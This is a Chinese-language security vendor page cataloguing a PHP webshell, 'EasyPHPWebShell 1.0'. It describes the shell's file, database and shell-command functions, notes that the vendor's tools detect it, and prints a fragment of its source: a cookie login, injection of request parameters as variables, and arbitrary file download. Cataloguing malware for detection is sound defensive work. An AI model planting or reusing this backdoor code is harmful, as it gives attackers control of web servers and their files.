EasyPHPWebShell 1.0(S8S8测试版)

2012-1-4 17:32:37 来源:本站原创,请勿转载 浏览:430
EasyPHPWebShell 1.0(S8S8测试版)

木马名称:EasyPHPWebShell 1.0(S8S8测试版)
木马格式:php
默认密码:
木马作用:文件管理,文本编辑,数据库操作,Shell命令……

运行界面如下:(图片若超出屏幕,请右键另存到本地查看)

总结:EasyPHPWebShell 1.0(S8S8测试版)是一款标准的Webshell,标准的网页木马,危险。
防御方法:护卫神入侵防护系统、护卫神云查杀均可查杀 EasyPHPWebShell 1.0(S8S8测试版) 这个php网页木马。

EasyPHPWebShell 1.0(S8S8测试版)代码片段:

<?

if($chkpassword == 1){
@session_start();
if ($_GET["action"] == "logout") {
@session_unregister("smy_password");
  @session_destroy();
  @setcookie ("cmy_password","");
  echo "<script>function redirect(){window.location.replace(\"{$_SERVER['PHP_SELF']}\");}redirect();</script>";
}
if($_GET["action"] == "login"){
  if($my_password==$_POST["pmy_password"]){
   @session_register("smy_password");
   $_SESSION["smy_password"] = $my_password;
   @setcookie ("cmy_password",$my_password,time()+(3600*$cookit_time));
   echo "<script>function redirect(){window.location.replace(\"{$_SERVER['PHP_SELF']}\");}redirect();</script>";
  }
}
if (@session_is_registered("smy_password")||isset($_COOKIE["cmy_password"])){
  if (($_SESSION["smy_password"]!=$my_password)&&(!isset($_COOKIE["cmy_password"])||$_COOKIE["cmy_password"]!=$my_password))
   getloginpass();
}else getloginpass();
}

if(!@get_cfg_var("register_globals")){
    foreach($_GET as $key => $val) $$key = $val;
    foreach($_POST as $key => $val) $$key = $val;
foreach($_FILES as $key => $val) $$key = $val;
}

if(isset($df_path)){
    if (!file_exists($df_path)) $errordownload = "没找到文件";
    else {
        $df_name = basename($df_path);
        $df_fhd=fopen($df_path,"rb");
        if($df_fhd==false) $errordownload = "打开文件错误";
        else{
            Header("Content-type: application/octet-stream");
            Header("Accept-Ranges: bytes");
            Header("Accept-Length: ".filesize($df_path));
            Header("Content-Disposition: attachment; filename=".$df_name);
            echo fread($df_fhd,filesize($df_path));
            fclose($df_fhd);
            exit;
        }
    }
}

if(isset($gotodir)) if($gotodir != "") $dir=$gotodir;

if(!isset($action)) {
    $action = "dir";
    $dir = ".";
}

if(!isset($dir)) $dir = ".";

$rootdir = str_replace("\\\\","/",$_SERVER["DOCUMENT_ROOT"]);


(0)
(0)